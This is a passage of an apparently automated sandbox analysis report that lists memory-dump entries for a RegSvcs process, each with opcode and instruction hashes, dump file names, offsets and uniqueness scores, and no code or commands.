                                                • Opcode Fuzzy Hash: 5f076d29098c25b61f9dce39b70f12fb29fa3170634858b8becca190cb4a7a0a
                                                • Instruction Fuzzy Hash: DF314D35E1061A9BDB19CFA8D49469EBBF2FF89300F508929E846E7751DF70A842CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 602bc30d9645b866809ea2cc07049a352761033ec809327a0ed4812b5ba4b9cf
                                                • Instruction ID: eea8de013f78616517223086aff68ae9304cb34ed146ebdf7e00e8e1bac42134
                                                • Opcode Fuzzy Hash: 602bc30d9645b866809ea2cc07049a352761033ec809327a0ed4812b5ba4b9cf
                                                • Instruction Fuzzy Hash: 5241C070D01348DFDB24DF99C484ADEBBF5FF48310F548429E819AB254DB75A946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d740dc3e0ede2a0518208d92ae18dadb11feae30d08254fafc002c0a269c5235
                                                • Instruction ID: 63ef0260cae92c3e9f6381737978d27109a83c434d4e65bac0cc2fc5d9ffe118
                                                • Opcode Fuzzy Hash: d740dc3e0ede2a0518208d92ae18dadb11feae30d08254fafc002c0a269c5235
                                                • Instruction Fuzzy Hash: 7331B135E102199BDB05CFE8C4907DEFBB2FF89304F50C659E445AB241EB719842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57e8e5c30fd276776c28f189839ad4932c144060f00764db3458b973eff50cb7
                                                • Instruction ID: 898febd2b583b272efe3526a2fcb8000e717e91c423cac201b6c9f31ac2c5c6c
                                                • Opcode Fuzzy Hash: 57e8e5c30fd276776c28f189839ad4932c144060f00764db3458b973eff50cb7
                                                • Instruction Fuzzy Hash: 2B21B135F102199FDB15CFA8C49069EFBB2FF89304F90C619E845EB251EB709842CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 499623b4aca6ee6c9275ef0f98a3fd7225037e2fa900db7bd00654067672c82c
                                                • Instruction ID: d13e1aa7d23c0dfada43c4e46385b58cfdb294ec0a51671686d2aee32c326516
                                                • Opcode Fuzzy Hash: 499623b4aca6ee6c9275ef0f98a3fd7225037e2fa900db7bd00654067672c82c
                                                • Instruction Fuzzy Hash: AB213831B042405FD706AB7D94612EE3FF6EF8A300B0485AAD046DB396DE358D07CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba7f33190db3001621711ed1da5c5482c359107ec393c30395ccc3b1d8f99092
                                                • Instruction ID: f2fb30462ab2ed7e0418cf86f15c382189f737f05abb19ed7e9badf198b07911
                                                • Opcode Fuzzy Hash: ba7f33190db3001621711ed1da5c5482c359107ec393c30395ccc3b1d8f99092
                                                • Instruction Fuzzy Hash: 0E21B6346151004FEF57EB78E884B6D37B5FB49344F408AA5D087CB296E774D8528F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3a0ecb1db1345828a1298644d6b52455bf272aa07a4e736aa718b06ddbed535
                                                • Instruction ID: b8e37f434e3171baa4c1682157f321938a19f9ac85fe2f3505df4e4be1f080e4
                                                • Opcode Fuzzy Hash: f3a0ecb1db1345828a1298644d6b52455bf272aa07a4e736aa718b06ddbed535
                                                • Instruction Fuzzy Hash: 02219034F042198BDB19CFA8D8546DEF7B2EF89304F50861AE856FB351EB70A942CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25cca12a75e02f9101f13603d028834e30ba159b1b9e4f9adde15a3bc6e32510
                                                • Instruction ID: 594d7c54ad8f279098c9af7f1ab6b0aa0b0c2b48c68042443d4671e571feff9d
                                                • Opcode Fuzzy Hash: 25cca12a75e02f9101f13603d028834e30ba159b1b9e4f9adde15a3bc6e32510
                                                • Instruction Fuzzy Hash: B321D230A043109FEF776BBCE5993BC37A5EB06315F4048A9E587CB2C2DA7588818B42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54cee58ef0bc97037c2e4923f7b2fdd774c3cc195c56a8118c00030aaa433d32
                                                • Instruction ID: 7255927f7f29001c637441e20783bf2f06dc6cd706b771d91521fbb8b0a9a071
                                                • Opcode Fuzzy Hash: 54cee58ef0bc97037c2e4923f7b2fdd774c3cc195c56a8118c00030aaa433d32
                                                • Instruction Fuzzy Hash: 17212834740204CFDB54EBB8D958B9D77F1FB48604F1004A8E446EB3A9EB769D01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdf40556f2f9a0f5f3df084fcd7eb58920a133f02057364dd00662777d69c9c2
                                                • Instruction ID: a1e78526646ea86b8c374cc131e16f3a5cc281b6120b797ec58b47937f137596
                                                • Opcode Fuzzy Hash: cdf40556f2f9a0f5f3df084fcd7eb58920a133f02057364dd00662777d69c9c2
                                                • Instruction Fuzzy Hash: 97216D34B40205CFEF54EBB8C5647AE77F6EF49241F6004A9D186EB2A4DB368D41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2531405322.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_d5d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab1dc6f0c1ff70e8bc232f5fc0159fae274e6cecc98b394d5a1e0f90cba0250c
                                                • Instruction ID: 1a476e8ddd3e18ec3c04edfadf5cb50ccba8953fdd6eb39fdf7ea99a35c69a2f
                                                • Opcode Fuzzy Hash: ab1dc6f0c1ff70e8bc232f5fc0159fae274e6cecc98b394d5a1e0f90cba0250c
                                                • Instruction Fuzzy Hash: 3E21F271604344DFDF24DF18D9C0B16BB66EB88315F24C569EC4A4B296C33AD84BCA72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7827900f9974a2ddb2d1dff6f5fe1d9372b2dee3d3aa5c4c7db59ee715560eb
                                                • Instruction ID: eafdf2cc5d0dd69b9bbbfe68c0ced2007c040b076b20765d23b4c3427af50d37
                                                • Opcode Fuzzy Hash: a7827900f9974a2ddb2d1dff6f5fe1d9372b2dee3d3aa5c4c7db59ee715560eb
                                                • Instruction Fuzzy Hash: 4921A171B001159FEF14DBA9C864BAE7BF6FF88714F50806AE505EB3A5DAB1DC008B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4b9f3ef9d93997d455cd67b601d00696a8d58bedc52939d15388ffba0e6ecbe
                                                • Instruction ID: af9acd1fd832399a8fc149e4e43ec13713722a83b8342b40714c69612fb49900
                                                • Opcode Fuzzy Hash: a4b9f3ef9d93997d455cd67b601d00696a8d58bedc52939d15388ffba0e6ecbe
                                                • Instruction Fuzzy Hash: AD218034F002099BDB19CFA8D8545DEB7B2EF89304F50861AE855BB340EB71A945CB50
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a7fca0c84de99b273b31b03847da864ce8eace03e255d4978c94259aaf7a729
                                                • Instruction ID: 37cc61571bb77f5abb227b8d6363b70a95913c88f927f35efdac990fd9d85fab
                                                • Opcode Fuzzy Hash: 5a7fca0c84de99b273b31b03847da864ce8eace03e255d4978c94259aaf7a729
                                                • Instruction Fuzzy Hash: 77217C34B402058FEB64EBB8C5247AE77F6EF89241F5004A8D046EB3A4DF369D01CBA1
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 099f32d570e6f58ac328ac7acd517716d7ee5d380718154a71fdfac4acb9b5ca
                                                • Instruction ID: 9c93ae5651febd867c0c0e2ee3a65ddf48dc3b707899725911f406c9bbc596ca
                                                • Opcode Fuzzy Hash: 099f32d570e6f58ac328ac7acd517716d7ee5d380718154a71fdfac4acb9b5ca
                                                • Instruction Fuzzy Hash: A22193386141004FEF57EB68E884B6D37B9FB49344F508A65D047CB29AEB74D8528F92
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 788e379e42608220aacb5f0ad5df461015a3a5f3655c2eb108efb9d20be2f376
                                                • Instruction ID: 7d079d005abb664bdff30a7df8431cd828a113107b3f5a73ecd7f59253456ae9
                                                • Opcode Fuzzy Hash: 788e379e42608220aacb5f0ad5df461015a3a5f3655c2eb108efb9d20be2f376
                                                • Instruction Fuzzy Hash: 3F2116347402058FDB54EBB8D958BAE77F1FB49204F5004A8F446EB3A8DB769D01CB90
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e3c9674814b32aca1b1f6a8ab1cc44bc5bdd791d6f020eb7b52d952cb804383
                                                • Instruction ID: 96bf410dbf57478ab95dc589812f83fcef40d630024b098ca39920d19ad1ee53
                                                • Opcode Fuzzy Hash: 1e3c9674814b32aca1b1f6a8ab1cc44bc5bdd791d6f020eb7b52d952cb804383
                                                • Instruction Fuzzy Hash: EB11E730B012085BFF6756FCC9103793394EB85244F5089AAF4C2DB28BEA65D9824BDA
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8a6b8d1900243b9bdcd1ab83f0a8eaba47945f1e6e90aaec7956e2d77e3f2b
                                                • Instruction ID: a218be90e7ee12c1c0a27fdcadff9fe6e7f98dbb9a1c115d85ff6225dda7097c
                                                • Opcode Fuzzy Hash: bd8a6b8d1900243b9bdcd1ab83f0a8eaba47945f1e6e90aaec7956e2d77e3f2b
                                                • Instruction Fuzzy Hash: 6711C830B0120C4FEF675ABCC4007393295EB85650F504979E0C2CF28AEA65DD828BD9
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2531405322.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_d5d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ebbe44f2879176ac9d21938657f3eb70e51ec5948f94f41c0c67484f878716f
                                                • Instruction ID: 2659d3a097d0b44a34ad6f3a779daf87c56285844fce49d4c7ee0539d119d931
                                                • Opcode Fuzzy Hash: 7ebbe44f2879176ac9d21938657f3eb70e51ec5948f94f41c0c67484f878716f
                                                • Instruction Fuzzy Hash: 81215E755093808FDB16CF24D994715BF72EB46314F28C5EADC498B6A7C33A980ACB72
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9b4264a13c14f6c9660fedbf9f8eb398bf6ec9e746193c4a9d0cb7e9af6d0cc
                                                • Instruction ID: d7711f200992e411350c79cabe04b1b12de5c011ac56ecc72df7f4586b31dcb5
                                                • Opcode Fuzzy Hash: c9b4264a13c14f6c9660fedbf9f8eb398bf6ec9e746193c4a9d0cb7e9af6d0cc
                                                • Instruction Fuzzy Hash: B3110679F403108FEF11ABB9A84426E7BF5FB88650F10086AD946D3340E730C812CB80
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 730125094f879b6767b2cb78908188b8537aa6f9836cd83cbd20d2dbcaddb987
                                                • Instruction ID: 5209993e35c8530991a519f5a31294ff6cb11834d2fa9269e6cfe47bc82b6019
                                                • Opcode Fuzzy Hash: 730125094f879b6767b2cb78908188b8537aa6f9836cd83cbd20d2dbcaddb987
                                                • Instruction Fuzzy Hash: E8012131A002159BDF51EFFC84501DE7BE5EB48250F9404B9D445E7301EB35C9428B95
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ba66d8a2beffc9a376324f0a2f2412a0b463120a3389535e7d31a75d358047b
                                                • Instruction ID: 81db971163d97a47c81fc8d06604115cdcadc8d61f8e0ac20ed9fa738954bcff
                                                • Opcode Fuzzy Hash: 7ba66d8a2beffc9a376324f0a2f2412a0b463120a3389535e7d31a75d358047b
                                                • Instruction Fuzzy Hash: F201B930A102048FDB14DF99D88478ABBB5FF84310F54C164D84C5B25AEBB0D945CBA1
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15bbdc782e8117d6a0257cccd4af8fca4b6156fc00c6736dad49867b850fedaf
                                                • Instruction ID: 3d6a9f8cc78d0154895d6244260d49cb9d4e6789dfd6775f6cbdaff3c63832b3
                                                • Opcode Fuzzy Hash: 15bbdc782e8117d6a0257cccd4af8fca4b6156fc00c6736dad49867b850fedaf
                                                • Instruction Fuzzy Hash: CFF0962190821E87FF7755EC45643392298DB51321FD04475F2CAC728EEB68CA55D3DB
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04aa2d633cc6280b21fc8c2c995dd4155239b901742cfee04ada6ed020862c5d
                                                • Instruction ID: 9f570d8a251149e1b53f5058ce5611abef626f7301d6b71ecc47ac1ab996b67f
                                                • Opcode Fuzzy Hash: 04aa2d633cc6280b21fc8c2c995dd4155239b901742cfee04ada6ed020862c5d
                                                • Instruction Fuzzy Hash: 9EF0F633A04110DFD7229BF884902EC7BA5EE59151B9D00D7D8C6EB201D736D442CB51
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed2a30101074becab9a122bf49cd6eb458944373d5c3ffd79a95fb242b63c55c
                                                • Instruction ID: 3e6f887b477563f31c60ba38564b3daa063a86c4c064d316a42e5e1c61ecb113
                                                • Opcode Fuzzy Hash: ed2a30101074becab9a122bf49cd6eb458944373d5c3ffd79a95fb242b63c55c
                                                • Instruction Fuzzy Hash: 7EF03C39B40118CFC714DB68D5A8B6C7BB2FF88315F1044A8E5068B3A0CB35AD02CF40
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 881ef93ff713a76a4a1389d14e5a6ad6a90d23e877efd74abbc61194589ab186
                                                • Instruction ID: 0029e5cd739fa1d8eeb30e4ac68c3f0c3ff6067b2e808e8209d073bf45cf9f78
                                                • Opcode Fuzzy Hash: 881ef93ff713a76a4a1389d14e5a6ad6a90d23e877efd74abbc61194589ab186
                                                • Instruction Fuzzy Hash: 8201AD349502459FEF1AEFB8F890A9D3B76FF41300B0046B8C4426B1D5EF31AA42CB92
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30eba70de53e355186f35fd1c08a139ab6f6029478548790bdebb616d6163acd
                                                • Instruction ID: 12327f1f1eb3c89c20d249ac4393c1a7299d7d5a78e89ba74c4ade9f70770559
                                                • Opcode Fuzzy Hash: 30eba70de53e355186f35fd1c08a139ab6f6029478548790bdebb616d6163acd
                                                • Instruction Fuzzy Hash: B6F01934911208AFDF05EFB8F891A9D7BB6EB44300F508678C406AB294EB716A558F92
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6f5d9fe87f8f33378b882d05cce3515b2290ac7cc7da67e59c60d9bfa7ae3cf
                                                • Instruction ID: af63217d1e83aab0a1b3207ab918e37bb05a3ed03df075b6e3e1d7f9a8271c22
                                                • Opcode Fuzzy Hash: c6f5d9fe87f8f33378b882d05cce3515b2290ac7cc7da67e59c60d9bfa7ae3cf
                                                • Instruction Fuzzy Hash: 21E0DF216AD25E81EE2B40E818B03796A9C8F32324FC04479F3C8DB61FE154C2A4D226
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58497338cf142d3bfce6fafe6df9afe6721a6df90aa821ec20ffe2cc808e25c
                                                • Instruction ID: 0859dcac896fa698e8521350d19a5178f9cf1d28dc13d19f3405c65d31ae132c
                                                • Opcode Fuzzy Hash: c58497338cf142d3bfce6fafe6df9afe6721a6df90aa821ec20ffe2cc808e25c
                                                • Instruction Fuzzy Hash: BCD0C20508C28D47931B12B85460F3D2B907C81124B4A44EBC8C05650EF00CC86ED2A3
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%